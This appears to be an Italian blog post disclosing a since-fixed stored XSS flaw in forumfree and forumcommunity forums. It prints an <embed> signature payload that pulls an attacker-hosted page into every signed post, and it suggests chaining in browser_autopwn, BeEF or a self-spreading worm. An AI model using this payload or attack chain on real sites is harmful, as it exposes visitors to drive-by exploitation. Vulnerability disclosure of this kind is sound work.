Aggiornamento del 12/6/11: il bug è stato fixato.

Sulla sezione advisories della comunità di backbox è stato pubblicato un paper che descrive una vulnerabilità stored XSS scoperto da bl4k3 e system_overide per iniettare del codice HTML nei forum del circuito forumfree e forumcommunity.

Nei suddetti forum è volontariamente permesso utilizzare il tag <embed> nella firma, allo scopo di poter includere script e giochini in flash. L’idea non è granchè, perchè allo stesso modo possiamo inserire (via control Panel > edit Signature) una stringa HTML con intenti meno frivoli dei giochini:

<embed
 allowNetworking="internal"
 allowScriptAccess="never"
 src="http://hcevolution.netsons.org/smf/_alert.html"
 height=0
 width=1>

In questo modo la pagina _alert.html viene inclusa in ogni post dai noi firmato, compresi eventuali script maliziosi in essa contenuti. Questo permette di manipolare a nostro piacimento ogni pagina dove è presente un nostro post, forzare i browser di chi le visita a fare richieste arbitrarie, fino a includervi exploit come browser_autopwn di metasploit o lo script di BeEF. Sarebbe possibile anche un piccolo worm che si autoposta: gli unici limiti sono la fantasia e il flag HttpOnly settato (almeno quello), che non permette di leggere i cookie via javascript.

Possibile che servizi simili soffrano della stessa vulnerabilità, visto che l’embedding è una feature nota e accettata. Gli amministratori dei forum in oggetto sono stati avvisati e si spera che venga eliminato questo vettore d’attacco.